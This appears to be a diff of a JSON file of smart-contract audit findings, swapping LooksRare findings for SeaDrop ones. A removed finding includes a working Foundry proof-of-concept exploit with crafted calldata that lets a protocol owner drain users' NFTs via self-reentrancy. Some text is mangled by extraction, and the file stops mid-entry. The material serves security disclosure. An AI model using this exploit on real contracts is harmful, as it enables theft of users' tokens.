StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid: T_i^0 = M_i^0, T_a^0 = M_a^0 = 1, taker can send extra itemIds and amounts but they won't be used. StrategyFloorFromChainlink.execute...DiscountCollectionOfferStrategyWithTakerAsk: T_a^0 = M_a^0 = 1, maker's itemIds are unused. StrategyCollectionOffer: T_a^0 = M_a^0, maker's itemIds are unused and taker's T_a^i for i > 0 are also unused. StrategyItemIdsRange: M_i^0 <= T_i^j <= M_i^1, sum over j of T_a^j = M_a^0. For InheritedStrategy, StrategyDutchAuction, StrategyUSDDynamicAsk, and StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid, the taker's itemIds and amounts are redundant as they should exactly match the maker's fields. For the other strategies, one can encode the required parameters in either maker's or taker's additionalParameters fields.", + "title": "mintParams.allowedNftToken should be cached", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "mintParams.allowedNftToken is accessed several times in the mintAllowedTokenHolder function. It would be cheaper to cache it: // Put the allowedNftToken on the stack for more efficient access. address allowedNftToken = mintParams.allowedNftToken;", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Gas Optimization" ] }, { - "title": "discount == 10_000 is not allowed in executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk reverts if discount == 10_000, but does not if discount == 99_99, which almost has the same effect. 
Note that if discount == 10_000 (forgetting about the revert), price = desiredPrice = 0. So, unless the taker (sender of the transaction) has set its takerAsk.minPrice to 0 (maker is bidding for a 100% discount and taker is gifting the NFT), the transaction would revert: if (takerAsk.minPrice > price) { // takerAsk.minPrice > 0 revert AskTooHigh(); }", + "title": "Immutables which are calculated using keccak256 of a string literal can be made constant.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Since Solidity 0.6.12, keccak256 expressions are evaluated at compile-time: Code Generator: Evaluate keccak256 of string literals at compile-time. The suggestion of marking these expressions as immutable to save gas isn't true for compiler versions >= 0.6.12. As a reminder, before that, the occurrences of constant keccak256 expressions were replaced by the expressions instead of the computed values, which added a computation cost.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Restructure executeMultipleTakerBids's input parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "executeMultipleTakerBids has the following form function executeMultipleTakerBids( OrderStructs.TakerBid[] calldata takerBids, OrderStructs.MakerAsk[] calldata makerAsks, bytes[] calldata makerSignatures, OrderStructs.MerkleTree[] calldata merkleTrees, address affiliate, bool isAtomic ) For the input parameters provided, we need to make sure takerBids, makerAsks, makerSignatures, and merkleTrees all have the same length. We can enforce this requirement by definition if we restructure the input passed to executeMultipleTakerBids.", + "title": "Combine a pair of mapping to a list and mapping to a mapping into mapping to a linked-list", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "SeaDrop uses 3 pairs of mapping to a list and mapping to a mapping that can be combined into just one mapping. The pairs: 1. _allowedFeeRecipients and _enumeratedFeeRecipients 2. _signers and _enumeratedSigners 3. 
_tokenGatedDrops and _enumeratedTokenGatedTokens Here we have variables that come in pairs. One variable is used for data retrievals (a flag or a custom struct) and the other for iteration/enumeration. mapping(address => mapping(address => CustomStructOrBool)) private variable; mapping(address => address[]) private _enumeratedVariable;", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Gas Optimization" ] }, { - "title": "An approved operator can call transferBatchItemsAcrossCollections", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "TransferManager has 3 endpoints that an approved operator can call: transferItemsERC721 transferItemsERC1155 transferBatchItemsAcrossCollections The first 2 share the same input parameter types but differ from transferBatchItemsAcrossCollections: , address transferItemsERC1155 address ,! address[], address[], address, address , uint256[][], uint256[][] // ,! transferBatchItemsAcrossCollections , address, uint256[], uint256[] // transferItemsERC721, 44 An operator like LooksRareProtocol might have an owner ( OL ) that can select/add arbitrary endpoint of this transfer manager for an asset type, but only call the transfer manager using the same input parameter types regardless of the added endpoint. So in this case, OL might add a new asset type with TransferManager.transferBatchItemsAcrossCollections.selector as the selector and this transfer manager as the manager. Now, since this operator/LooksRareProtocol (and possibly other future implementations of approved operators) uses the same list of parameters for all endpoints, when _transferNFT gets called, the transfer manager using the transferBatchItemsAcrossCollections endpoint but with the following encoded data: the protocol would call abi.encodeWithSelector( managerSelectorOfAssetType[assetType].selector, collection, sender, recipient, itemIds, amounts ) ) A crafty OL might try to take advantage of the parameter type mismatch to create a malicious payload (address, address, address, uint256[], uint256[] ) that when decoded as (address[], address[], address, address, uint256[][], uint256[][]) It would allow them to transfer any NFT tokens from any user to some specific users. ; interpreted paramters | original parameter ,! ; ---------------------------------- ,! -------- c Ma.s or msg.sender 00000000000000000000000000000000000000000000000000000000000000c0 ; collections.ptr 0000000000000000000000000000000000000000000000000000000000000100 ; assetTypes.ptr ,! 00000000000000000000000000000000000000000000000000000000000000X3 ; from ,! 00000000000000000000000000000000000000000000000000000000000000X4 ; to ,! itemIds.ptr -> 0xa0 Tb.r or Mb.s x 0000000000000000000000000000000000000000000000000000000000000140 ; itemIds.ptr ,! amounts.ptr -> 0xc0 + 0x20 * itemIds.length 00000000000000000000000000000000000000000000000000000000000001c0 ; amounts.ptr ,! itemIds.length | collection | from / | to / | | | ; ; | itemIds[0] | itemIds[1] ... Fortunately, that is not possible since in this particular instance the transferItemsERC721 and transferItem- sERC1155's amounts's calldata tail pointer always coincide with transferBatchItemsAcrossCollections's itemIds's calldata tail pointer (uint256[] amounts, uint256[][] itemIds) which unless both have length 0 it would cause the compiled code to revert due to out of range index access. 
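To make the shape of this risk concrete, the following minimal sketch (hypothetical code, not from the audited codebase) shows how abi.encodeWithSelector pairs a selector with an argument list without any type checking, which is exactly what would allow arguments laid out for transferItemsERC721/transferItemsERC1155 to be combined with the selector of transferBatchItemsAcrossCollections:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Hypothetical illustration only: abi.encodeWithSelector performs no type
// checking, so a selector taken from one function can be paired with an
// argument list encoded for a different parameter list. Whether the callee
// reverts on decoding depends on the compiler's calldata validation.
contract SelectorConfusionSketch {
    function encodeMismatched(
        bytes4 selector, // e.g. transferBatchItemsAcrossCollections.selector
        address collection,
        address from,
        address to,
        uint256[] memory itemIds,
        uint256[] memory amounts
    ) external pure returns (bytes memory) {
        // Argument layout of transferItemsERC721/transferItemsERC1155,
        // combined with an arbitrary, caller-chosen selector.
        return abi.encodeWithSelector(selector, collection, from, to, itemIds, amounts);
    }
}

Such a payload only decodes under the other signature if the calldata offsets happen to line up, which is what the compiler's out-of-range checks prevented in this instance.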
This is also dependent on if/how the compiler encodes/decodes the calldata and on whether the compiler adds bytecode to make the deployed code revert on out-of-range accesses (which solc does). This is just a lucky coincidence; otherwise, OL could have exploited this flaw.", + "title": "The onlyAllowedSeaDrop modifier is redundant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The onlyAllowedSeaDrop modifier is always used next to another one (onlyOwner, onlyAdministrator or onlyOwnerOrAdministrator). As the owner, which is the least privileged role, already has the privilege to update the allowed SeaDrop registry list for this contract (by calling updateAllowedSeaDrop), this makes this second modifier redundant.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Gas Optimization" ] }, { - "title": "Shared logic in different StrategyFloorFromChainlink strategies can be refactored", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": " executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategyWithTakerBid. executeFixedDiscountCollectionOfferStrategyWithTakerAsk and executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk. Each group of endpoints in the above list shares the exact same logic; the only difference is the formula and checks used to calculate the desiredPrice based on a given floorPrice and premium/discount. function a1() external view returns () { () = _a1(); // inlined computation of _a1 } function a2() external view returns () { () = _a2(); // inlined computation of _a2 }", + "title": "Combine _allowedSeaDrop and _enumeratedAllowedSeaDrop in ERC721SeaDrop to save storage and gas.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Combine _allowedSeaDrop and _enumeratedAllowedSeaDrop into just one variable using a cyclic linked-list data structure, as sketched below.
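A minimal hypothetical sketch of such a combined structure, using a sentinel-based cyclic linked list (the names here are assumptions, not SeaDrop's actual code; the pattern follows e.g. Safe's OwnerManager):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.15;

// Hypothetical sketch: one mapping provides both the membership flag and the
// enumeration. A sentinel entry closes the cycle.
contract AllowedSeaDropSet {
    address private constant SENTINEL = address(0x1);
    mapping(address => address) private _next; // _next[last] == SENTINEL

    constructor() {
        _next[SENTINEL] = SENTINEL;
    }

    function isAllowed(address seaDrop) public view returns (bool) {
        return seaDrop != SENTINEL && _next[seaDrop] != address(0);
    }

    function add(address seaDrop) external {
        require(seaDrop != address(0) && seaDrop != SENTINEL && _next[seaDrop] == address(0));
        _next[seaDrop] = _next[SENTINEL];
        _next[SENTINEL] = seaDrop;
    }

    // The caller supplies the predecessor, so removal needs no iteration.
    function remove(address prev, address seaDrop) external {
        require(seaDrop != SENTINEL && _next[prev] == seaDrop);
        _next[prev] = _next[seaDrop];
        delete _next[seaDrop];
    }

    function enumerate() external view returns (address[] memory out) {
        uint256 n;
        for (address a = _next[SENTINEL]; a != SENTINEL; a = _next[a]) n++;
        out = new address[](n);
        uint256 i;
        for (address a = _next[SENTINEL]; a != SENTINEL; a = _next[a]) out[i++] = a;
    }
}

Note how remove takes the predecessor as a parameter, which also addresses the earlier finding about providing the index of the element to be removed instead of iterating.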
This would reduce storage space and save gas when storing or retrieving parameters.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Gas Optimization" ] }, { - "title": "Setting protocol and ask fee amounts and recipients can be refactored in ExecutionManager", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Setting and calculating the protocol and ask fee amounts and recipients follow the same logic in _executeStrategyForTakerAsk and _executeStrategyForTakerBid.", + "title": ".length should not be looked up in every loop of a for-loop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Reading an array's length at each iteration of a loop consumes more gas than necessary.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Gas Optimization" ] }, { - "title": "Creator fee amount and recipient calculation can be refactored in ExecutionManager", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "The creator fee amount and recipient calculation in _executeStrategyForTakerAsk and _executeStrategyForTakerBid are identical and can be refactored.", + "title": "A storage pointer should be cached instead of computed multiple times", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Caching a mapping's value in a local storage variable when the value is accessed multiple times saves gas due to not having to perform the same offset calculation every time.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Gas Optimization" ] }, { - "title": "The owner can set the selector for a strategy to any bytes4 value", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "The owner can set the selector for a strategy to any bytes4 value (as long as it's not bytes4(0)). Even though the following check exists: if (!IBaseStrategy(implementation).isLooksRareV2Strategy()) { revert NotV2Strategy(); } there is no measure taken to avoid potential selector collisions with other contract types.", + "title": "Comparing a boolean to a constant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Comparing to a constant (true or false) is a bit more expensive than directly checking the returned boolean value.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Gas Optimization" ] }, { - "title": "Constraints among the number of item ids and amounts for taker or maker bids or asks are inconsistent among different strategies.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Constraints among the number of item ids and amounts for taker or maker bids or asks are inconsistent among different strategies.
Notation: Ti = length of the taker's bid (or ask, depending on the context) itemIds; Ta = length of the taker's bid (or ask) amounts; Mi = length of the maker's bid (or ask) itemIds; Ma = length of the maker's bid (or ask) amounts. InheritedStrategy: Ti = Ta = Mi = Ma. StrategyItemIdsRange: Ti <= Ta, Mi = 2, Ma = 1 (related issue). StrategyDutchAuction: Mi <= Ti, Ma <= Ta, Mi = Ma. StrategyUSDDynamicAsk: Mi <= Ti, Ma <= Ta, Mi = Ma. StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid: Mi <= Ti, Ma <= Ta, Mi = Ma = 1. StrategyFloorFromChainlink.execute...DiscountCollectionOfferStrategyWithTakerAsk: Ti = 1, 1 = Ta, Ma = 1. StrategyCollectionOffer: Ti = 1, 1 <= Ta, Ma = 1. The equalities above are explicitly enforced, but the inequalities are implicitly enforced through the compiler's out-of-bounds revert. Note that in most cases (except StrategyItemIdsRange) one can enforce Ti = Ta = Mi = Ma and refactor this logic into a utility function.", + "title": "mintAllowList, mintSigned, or mintAllowedTokenHolder have an inherent cap for minting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "mintAllowedTokenHolder is stored in a uint40 (after this audit uint32) which limits the maximum token id that can be minted using mintAllowList, mintSigned, or mintAllowedTokenHolder.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Requirements/checks for adding new transfer managers (or strategies) are really important to avoid self-reentrancy through restrictedExecuteTakerBid from unexpected call sites", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "When a new transfer manager gets added to the protocol, there is a check to make sure that this manager cannot be the protocol itself. This is really important as restrictedExecuteTakerBid allows the protocol itself to call this endpoint. If the check below was omitted: if ( transferManagerForAssetType == address(0) || // transferManagerForAssetType == address(this) || selectorForAssetType == bytes4(0) ) { revert ManagerSelectorEmpty(); } the owner could add the protocol itself as a transfer manager for a new asset type and pick the selector to be ILooksRareProtocol.restrictedExecuteTakerBid.selector. Then the owner along with a special address can collude and drain users' NFT tokens from an actual approved transfer manager for ERC721/ERC1155 assets. The special feature of restrictedExecuteTakerBid is that once it's called, the parameters provided by the maker are not checked/verified against any signatures. The PoC below includes 2 different custom strategies for an easier setup but they are not necessary (one can use the default strategy). One creates the calldata payload and the other is called later on to select a desired NFT token id. The calldata to restrictedExecuteTakerBid(...) is crafted so that the corresponding desired parameters for an actual transferManager.call can be set by itemIds; parameters offset ,! ------------------------------------------------------------------------------------------------------- c ,!
0x0000 interpreted parameters ---------- | original msg.sender, , can be changed by stuffing 0s 0000000000000000000000000000000000000000000000000000000000000080 0000000000000000000000000000000000000000000000000000000000000180 ,! 00000000000000000000000000000000000000000000000000000000000000X1 ; sender ,! 00000000000000000000000000000000000000000000000000000000000000a0 ,! msg.sender / signer ho, orderHash, 0xa0 | collection | signer / | Ta.r or | i[] ptr 0x0080 ,! to, can be changed by stuffing 0s 00000000000000000000000000000000000000000000000000000000000000X2 ; Tb.r | a[] ptr , 0x0180 00000000000000000000000000000000000000000000000000000000000000X3 ; Tb.p_max 00000000000000000000000000000000000000000000000000000000000000a0 00000000000000000000000000000000000000000000000000000000000000c0 00000000000000000000000000000000000000000000000000000000000000e0 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 from 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000X4 ; sid 00000000000000000000000000000000000000000000000000000000000000X5 ; t 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000X6 ; T 00000000000000000000000000000000000000000000000000000000000000X7 ; C 00000000000000000000000000000000000000000000000000000000000000X8 ; signer ,! 00000000000000000000000000000000000000000000000000000000000000X9 ; ts 00000000000000000000000000000000000000000000000000000000000000Xa ; te 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000001c0 00000000000000000000000000000000000000000000000000000000000001e0 0000000000000000000000000000000000000000000000000000000000000200 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 | i[].len | i[0] | i[1] | i[2] | i[3] | i[4] | i[5] | i[6] | i[7] | i[8] | i[9] | i[10] | i[11] | i[12] | i[13] , | i[14] | i[15] | i[16] | i[17] | i[18] | i[19] | i[20] | i[21] | i[22] ; T = real_collection ; C = currency ; t = assetType ; sid = strategyId ; ts = startTime ; te = endTime ; Ta = takerAsk ; Tb = takerBid // file: test/foundry/AssetAttack.t.sol pragma solidity 0.8.17; import {IStrategyManager} from \"../../contracts/interfaces/IStrategyManager.sol\"; import {IBaseStrategy} from \"../../contracts/interfaces/IBaseStrategy.sol\"; import {OrderStructs} from \"../../contracts/libraries/OrderStructs.sol\"; import {ProtocolBase} from \"./ProtocolBase.t.sol\"; import {MockERC20} from \"../mock/MockERC20.sol\"; 61 interface IERC1271 { function isValidSignature( bytes32 digest, bytes calldata signature ) external returns (bytes4 magicValue); } contract PayloadStrategy is IBaseStrategy { address private owner; address private collection; address private currency; uint256 private assetType; address private signer; uint256 private nextStartegyId; constructor() { owner = msg.sender; } function set( address _collection, address _currency, uint256 _assetType, address _signer, uint256 _nextStartegyId ) external { if(msg.sender != owner) revert(); collection = _collection; currency = _currency; assetType = _assetType; signer = 
_signer; nextStartegyId = _nextStartegyId; } function isLooksRareV2Strategy() external pure override returns (bool) { return true; } function execute( OrderStructs.TakerBid calldata /* takerBid */ , OrderStructs.MakerAsk calldata /* makerAsk */ ) external view returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) { itemIds = new uint256[](23); itemIds[0] = 0xa0; itemIds[1] = 0xc0; itemIds[2] = 0xe0; 62 itemIds[8] = nextStartegyId; itemIds[9] = assetType; itemIds[11] = uint256(uint160(collection)); itemIds[12] = uint256(uint160(currency)); itemIds[13] = uint256(uint160(signer)); itemIds[14] = 0; // startTime itemIds[15] = type(uint256).max; // endTime itemIds[17] = 0x01c0; itemIds[18] = 0x01e0; itemIds[19] = 0x0200; } } contract ItemSelectorStrategy is IBaseStrategy { address private owner; uint256 private itemId; uint256 private amount; constructor() { owner = msg.sender; } function set( uint256 _itemId, uint256 _amount ) external { if(msg.sender != owner) revert(); itemId = _itemId; amount = _amount; } function isLooksRareV2Strategy() external pure override returns (bool) { return true; } function execute( OrderStructs.TakerBid calldata /* takerBid */ , OrderStructs.MakerAsk calldata /* makerAsk */ external view returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) itemIds = new uint256[](1); itemIds[0] = itemId; amounts = new uint256[](1); amounts[0] = amount; ) { } } contract AttackTest is ProtocolBase { PayloadStrategy private payloadStrategy; 63 ItemSelectorStrategy private itemSelectorStrategy; MockERC20 private mockERC20; // // can be an arbitrary address uint256 private signingOwnerPK = 42; address private signingOwner = vm.addr(signingOwnerPK); // this address will define an offset in the calldata // and can be changed up to a certain upperbound by // stuffing calldata with 0s. address private specialUser1 = address(0x180); // NFT token recipient of the attack can also be changed // up to a certain upper bound by stuffing the calldata with 0s address private specialUser2 = address(0x3a0); // can be an arbitrary address address private victimUser = address(505); function setUp() public override { super.setUp(); vm.startPrank(_owner); { looksRareProtocol.initiateOwnershipTransfer(signingOwner); } vm.stopPrank(); vm.startPrank(signingOwner); { looksRareProtocol.confirmOwnershipTransfer(); mockERC20 = new MockERC20(); looksRareProtocol.updateCurrencyWhitelistStatus(address(mockERC20), true); looksRareProtocol.updateCreatorFeeManager(address(0)); mockERC20.mint(victimUser, 1000); mockERC721.mint(victimUser, 1); // This particular strategy is not a requirement of the exploit. 
// it just makes it easier payloadStrategy = new PayloadStrategy(); looksRareProtocol.addStrategy( 0, 0, 0, PayloadStrategy.execute.selector, true, address(payloadStrategy) ); itemSelectorStrategy = new ItemSelectorStrategy(); looksRareProtocol.addStrategy( 0, 0, 0, ItemSelectorStrategy.execute.selector, false, address(itemSelectorStrategy) ); } 64 vm.stopPrank(); _setUpUser(victimUser); } function testAttack() public { vm.startPrank(signingOwner); looksRareProtocol.addTransferManagerForAssetType( 2, address(looksRareProtocol), looksRareProtocol.restrictedExecuteTakerBid.selector ); payloadStrategy.set( address(mockERC721), address(mockERC20), 0, victimUser, 2 // itemSelectorStrategy ID ); itemSelectorStrategy.set(1, 1); OrderStructs.MakerBid memory makerBid = _createSingleItemMakerBidOrder({ // payloadStrategy bidNonce: 0, subsetNonce: 0, strategyId: 1, assetType: 2, // LooksRareProtocol itself orderNonce: 0, collection: address(0x80), // calldata offset currency: address(mockERC20), signer: signingOwner, maxPrice: 0, itemId: 1 }); bytes memory signature = _signMakerBid(makerBid, signingOwnerPK); OrderStructs.TakerAsk memory takerAsk; vm.stopPrank(); vm.prank(specialUser1); looksRareProtocol.executeTakerAsk( takerAsk, makerBid, signature, _EMPTY_MERKLE_TREE, _EMPTY_AFFILIATE ); assertEq(mockERC721.balanceOf(victimUser), 0); assertEq(mockERC721.ownerOf(1), specialUser2); } }", + "title": "Consider replacing minterIfNotPayer parameter to always correspond to the minter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Currently, the variable minterIfNotPayer is treated in the following way: if the value is 0, then msg.sender would be considered as the minter. Otherwise, minterIfNotPayer would be considered as the minter. The logic can be simplified to always treat this variable as the minter. The 0 can be replaced by setting msg.sender as minterIfNotPayer. The variable should then be renamed as well--we recommend calling it minter afterwards.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "viewCreatorFeeInfo can be simplified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "viewCreatorFeeInfo includes a low-level staticcall to collection's royaltyInfo endpoint and later its return status is compared and the return data is decoded.", + "title": "The interface IERC721ContractMetadata does not extend IERC721 interface", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The current interface IERC721ContractMetadata does not include the ERC-721 functions. 
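A sketch of the suggested extension follows (the OpenZeppelin import path and the maxSupply() member shown are assumptions for illustration, not necessarily the interface's actual members):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.15;

import { IERC721 } from "@openzeppelin/contracts/token/ERC721/IERC721.sol";

// Hypothetical sketch: make the metadata interface extend IERC721 so that
// the standard ERC-721 functions are part of the interface as well.
interface IERC721ContractMetadata is IERC721 {
    // Representative member only; the existing metadata functions would remain.
    function maxSupply() external view returns (uint256);
}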
As a comparison, OpenZeppelin's IERC721Metadata.sol extends the IERC721 interface.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "_verifyMerkleProofOrOrderHash can be simplified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "_verifyMerkleProofOrOrderHash includes an if/else block that calls into _computeDigestAndVerify with almost the same inputs (only the hash is different).", + "title": "Add unit tests for mintSigned and mintAllowList in SeaDrop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The only tests for the mintSigned and the mintAllowList functions are fuzz tests.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "isOperatorValidForTransfer can be modified to refactor more of the logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "isOperatorValidForTransfer is only used to revert if necessary. The logic around the revert decision is duplicated on all call sites.", + "title": "Rename a variable with a misleading name", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The enumeratedDropsLength variable name in SeaDrop._removeFromEnumeration is a bit misleading since _removeFromEnumeration is also used for signer lists, feeRecipient lists, etc.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Keep maximum allowed number of characters per line to 120.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "There are a few long lines in the code base.
contracts/executionStrategies/StrategyCollectionOffer.sol: 21:2, 27:2, 29:2, 30:2, 67:2, 69:2, 70:2, 118:2, 119:2: error, Line length must be no more than 120 (current lengths 127, 163, 121, 121, 163, 121, 121, 123, 121) [max-line-length]. contracts/executionStrategies/StrategyDutchAuction.sol: 20:2, 22:2, 23:2: error max-line-length (163, 121, 121); 26:5: warning, Function has cyclomatic complexity 9 but allowed no more than 7 [code-complexity]; 70:31: warning, Avoid to make time-based decisions in your business logic [not-rely-on-time]; 85:2, 86:2: error max-line-length (123, 121); 92:5: warning, Function has cyclomatic complexity 8 but allowed no more than 7 [code-complexity]. contracts/executionStrategies/StrategyItemIdsRange.sol: 15:2, 20:2, 21:2, 22:2, 23:2: error max-line-length (142, 163, 163, 121, 121); 25:5: warning, Function has cyclomatic complexity 12 but allowed no more than 7 [code-complexity]; 100:2, 101:2: error max-line-length (123, 121). contracts/helpers/OrderValidatorV2A.sol: 40:2, 53:2, 225:2, 279:2: error max-line-length (121, 121, 127, 127); 498:24, 501:26: warning, Avoid to make time-based decisions in your business logic [not-rely-on-time]; 511:2: error max-line-length (143); 593:5, 662:5: warning, Function has cyclomatic complexity 9 but allowed no more than 7 [code-complexity]; 758:5: warning, Function order is incorrect, internal view function can not go after internal pure function (line 727) [ordering]; 830:5: warning, Function has cyclomatic complexity 10 but allowed no more than 7 [code-complexity]; 843:17, 850:17: warning, Avoid to use inline assembly. It is acceptable only in rare cases [no-inline-assembly]; 906:5, 963:5: warning, Function has cyclomatic complexity 8 but allowed no more than 7 [code-complexity]. contracts/helpers/ValidationCodeConstants.sol: 17:2, 18:2: error max-line-length (129, 121). contracts/interfaces/ILooksRareProtocol.sol: 160:2: error max-line-length (122). contracts/libraries/OrderStructs.sol: 12:2, 18:2, 23:2: error max-line-length (292, 292, 127); 49:5: warning, Function order is incorrect, struct definition can not go after state variable declaration (line 26) [ordering]; 81:2: error max-line-length (128); 144:2: error max-line-length (131). In total: 49 problems (34 errors, 15 warnings).", + "title": "The protocol rounds the fees in the favour of creatorPaymentAddress", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The feeAmount calculation rounds down, i.e., rounds in the favour of creatorPaymentAddress and against feeRecipient. For a minuscule amount of ETH (price such that price * feeBps < 10000), the fees received by the feeRecipient would be 0. An interesting case here would be if the value quantity * price * feeBps is greater than or equal to 10000 and price * feeBps < 10000. In this case, the user can split the mint transaction into multiple transactions to skip the fees. However, this is unlikely to be profitable, considering the gas overhead involved as well as the minuscule amount of savings.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "avoid transferring in _transferFungibleTokens when sender and recipient are equal", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Currently, there is no check in _transferFungibleTokens to avoid transferring funds from sender to recipient when they are equal. There is only one check outside of _transferFungibleTokens, when one wants to transfer to an affiliate; a minimal guard is sketched below.
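A guard inside the function itself might look like the following sketch (the signature and the transfer helper are assumptions based on the finding, not the audited code):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Hypothetical sketch of short-circuiting no-op transfers.
abstract contract TransferGuardSketch {
    function _executeTokenTransfer(address currency, address sender, address recipient, uint256 amount) internal virtual;

    function _transferFungibleTokens(address currency, address sender, address recipient, uint256 amount) internal {
        // Skip the external call when it would be a no-op: self-transfer or zero amount.
        if (sender == recipient || amount == 0) return;
        _executeTokenTransfer(currency, sender, recipient, amount);
    }
}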
But if the bidUser is the creator, the ask recipient or the protocolFeeRecipient, the check is missing.", + "title": "Consider using type(uint).max as the magic value for maxTokenSupplyForStage instead of 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The value 0 is currently used as a magic value for maxTokenSupplyForStage, meaning that the check quantity + currentTotalSupply > maxTokenSupplyForStage is skipped. However, the value type(uint).max is a more appropriate magic value in this case. This also avoids the need for additional branching if (maxTokenSupplyForStage != MAGIC_VALUE) as the condition quantity + currentTotalSupply > type(uint).max is never true.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Keep the order of parameters consistent in updateStrategy", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In updateStrategy, isActive is set first when updating storage, and it's the second parameter when supplied to the StrategyUpdated event. But it is the last parameter supplied to updateStrategy.", + "title": "Missing edge case tests on uninitialized AllowList", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The default value for _allowListMerkleRoots[nftContract] is 